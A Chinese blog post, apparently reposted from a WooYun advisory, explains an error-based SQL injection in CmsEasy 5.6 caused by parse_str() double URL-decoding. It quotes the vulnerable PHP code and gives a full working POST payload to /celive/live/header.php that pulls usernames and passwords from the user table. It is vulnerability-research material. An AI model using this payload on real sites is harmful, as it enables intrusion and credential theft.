zoukankan      html  css  js  c++  java

  • cmseasy CmsEasy_5.6_20151009 无限制报错注入(parse_str()的坑)

    来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137013.html

    parse_str()引发的注入,

    //parse_str()的作用是解析字符串并且把字符串注册成变量,第二个参数$arr是一个数组,parse_str()之前会先urldecode,也就是会二次url解码,实现单引号逃逸。

    漏洞距离现在好像有点年代久远,有个限制就是对于php的版本要小于5.4,因为5.4以后默认关闭gpc,如果关闭gpc就会调用addslashes().

    1
    2
    3
    4
    5
    6
    7
    8
    function Postdata($a) {
        global $db;
        $chatid = $_SESSION['chatid'];
        $name = $_SESSION['name'];
        $a['detail'] = htmlspecialchars($a['detail']);
        if (!get_magic_quotes_gpc()) {
            $a['detail'] = addslashes($a['detail']);
        }<br>}

      

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
        if ($rootTag == "xjxquery") {
            $sQuery = "";
            $this->iPos++;
            while (!stristr($this->aObjArray[$this->iPos], "</xjxquery>")) {
                if (stristr($this->aObjArray[$this->iPos], "<q>") || stristr($this->aObjArray[$this->iPos], "</q>")) {
                    $this->iPos++;
                    continue;
                }
                $sQuery .= $this->aObjArray[$this->iPos];
                $this->iPos++;
            }
            parse_str($sQuery, $aArray);
            if ($this->bDecodeUTF8Input) {
                foreach ($aArray as $key => $value) {
                    $aArray[$key] = $this->_decodeUTF8Data($value);
                }
            }
            if (get_magic_quotes_gpc() == 1) {
                $newArray = array();
                foreach ($aArray as $sKey => $sValue) {
                    if (is_string($sValue))
                        $newArray[$sKey] = stripslashes($sValue);
                    else
                        $newArray[$sKey] = $sValue;
                }
                $aArray = $newArray;
            }
        }
        return $aArray;
    }

      

    漏洞出现在parse_str($sQuery, $aArray);

    所以能进行报错注入

    url: /celive/live/header.php

    post:

    xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
  • 相关阅读:
    从dotNet到VB6之模仿构造OleDbDataAdapter与dataset结合
    编程的偷懒艺术与美感
    给您参考,现在开发数据库项目用.net 2005成熟吗?还是用.net2003比较有保证
    access数据库版权及容量问题
    中天股票数据格式
    受伤与药油的最佳搭配
    关于发布各种股票软件数据格式
    .net 与flash8传递(互传)数组的技巧
    我的C语言合集
    ZOJ 1205 Martian Addition 解题报告
  • 原文地址:https://www.cnblogs.com/lzkalislw/p/13511564.html
Copyright © 2011-2022 走看看